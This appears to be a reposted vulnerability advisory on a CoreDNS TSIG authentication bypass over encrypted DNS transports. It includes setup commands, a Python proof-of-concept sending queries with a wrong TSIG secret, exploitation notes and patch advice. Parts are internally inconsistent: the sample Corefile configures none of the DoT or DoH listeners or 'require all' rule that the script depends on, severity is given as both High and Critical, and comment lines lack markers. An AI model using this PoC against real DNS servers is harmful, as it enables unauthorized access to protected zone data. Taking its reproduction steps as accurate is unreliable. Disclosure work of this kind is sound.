Listen to this Post
How the mentioned CVE works:
The tsig plugin in CoreDNS decides whether an incoming TSIG was valid by using w.TsigStatus() (plugin/tsig/tsig.go). On plain DNS/TCP/UDP, the transport correctly sets TsigSecret and carries out verification. However, on non‑plain transports the writer’s TsigStatus() either returns nil without performing any check or only checks the key name:
– DoH (https://): DoHWriter.TsigStatus() always returns nil (core/dnsserver/https.go).
– DoT (tls://): the TLS server builds a dns.Server without TsigSecret (core/dnsserver/server_tls.go).
– DoH3 (HTTP/3): reuses the same DoH writer, so it inherits the nil behavior (core/dnsserver/server_https3.go → core/dnsserver/https.go).
– DoQ (QUIC): DoQWriter.TsigStatus() is hard‑coded to return nil (core/dnsserver/quic.go).
– gRPC: gRPCresponse.TsigStatus() is likewise hard‑coded to return nil (core/dnsserver/server_grpc.go).
Because the plugin trusts these writer implementations instead of performing its own TSIG verification, a request containing an invalid TSIG secret is rejected correctly over plain TCP (rcode=9 NOTAUTH) but is accepted over DoT, DoH, DoH3, DoQ, and gRPC, returning NOERROR (rcode=0) with an answer section. An attacker who does not know the shared secret can therefore satisfy `require all` directives on the affected transports.
dailycve form:
Platform: CoreDNS
Version: 1.14.2, earlier
Vulnerability : TSIG auth bypass
Severity: High
Date: 2026-04-25
Prediction: upgrade 1.14.3
Analytics
What Undercode Say:
Clone CoreDNS repository and checkout vulnerable version
git clone https://github.com/coredns/coredns.git
cd coredns
git checkout v1.14.2
Run a vulnerable CoreDNS instance with tsig plugin
cat > Corefile <<EOF
. {
tsig example.com {
secret somesecret.
}
forward . 8.8.8.8
}
EOF
./coredns -conf Corefile
tsig-repro.py – minimal PoC to verify TSIG bypass over DoT/DoH
Adjust COREDNS_BIN to point to your CoreDNS binary
import dns.message
import dns.query
import dns.tsig
import dns.name
keyname = dns.name.from_text("example.com")
secret = "somesecret."
Use a completely wrong secret to simulate an invalid TSIG
wrong_secret = "wrongsecret"
tsig_ctx = dns.tsig.Key(keyname, secret, algorithm=dns.tsig.HMAC_MD5)
wrong_tsig_ctx = dns.tsig.Key(keyname, wrong_secret, algorithm=dns.tsig.HMAC_MD5)
q = dns.message.make_query("example.org.", "A")
q.use_tsig(keyring={keyname: wrong_tsig_ctx}, keyname=keyname)
Over plain TCP -> expected NOTAUTH (rcode 9)
resp_tcp = dns.query.tcp(q, "127.0.0.1", port=53)
print(f"TCP response: {resp_tcp.rcode()}")
Over DoT (tls://127.0.0.1:853) -> expected NOERROR (rcode 0)
resp_dot = dns.query.tls(q, "127.0.0.1", port=853)
print(f"DoT response: {resp_dot.rcode()}")
Over DoH (https://127.0.0.1:443/dns-query) -> expected NOERROR (rcode 0)
resp_doh = dns.query.https(q, "https://127.0.0.1:443/dns-query")
print(f"DoH response: {resp_doh.rcode()}")
Exploit:
An unauthenticated remote attacker sends a DNS query over an affected encrypted transport (DoT, DoH, DoH3, DoQ, gRPC) with a TSIG record that is invalid, missing, or uses an incorrect secret. Because the transport writer’s `TsigStatus()` always returns nil, the tsig plugin incorrectly treats the request as authenticated and passes it to the rest of the plugin chain. This allows an adversary to bypass `require all` rules, gaining access to zone data, privileged queries, or any other resource the administrator intended to protect with TSIG.
Protection from this CVE
- Upgrade to CoreDNS version 1.14.3 or later, where affected transports are modified to perform TSIG verification directly or to correctly signal a verification failure.
- Workaround: Restrict access to DoT, DoH, DoH3, DoQ, and gRPC listeners to trusted networks only, effectively reducing the attack surface.
- Audit configurations that rely on `tsig { require all }` and ensure they are not exposed on unpatched versions.
Impact:
Critical – Unauthenticated network attackers can completely bypass TSIG‑based authentication and authorization on all encrypted DNS transports, gaining the same privileges as a legitimate TSIG‑authenticated client. This can lead to unauthorized data exfiltration, manipulation of DNS responses, and compromise of any security policies that depend on TSIG.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
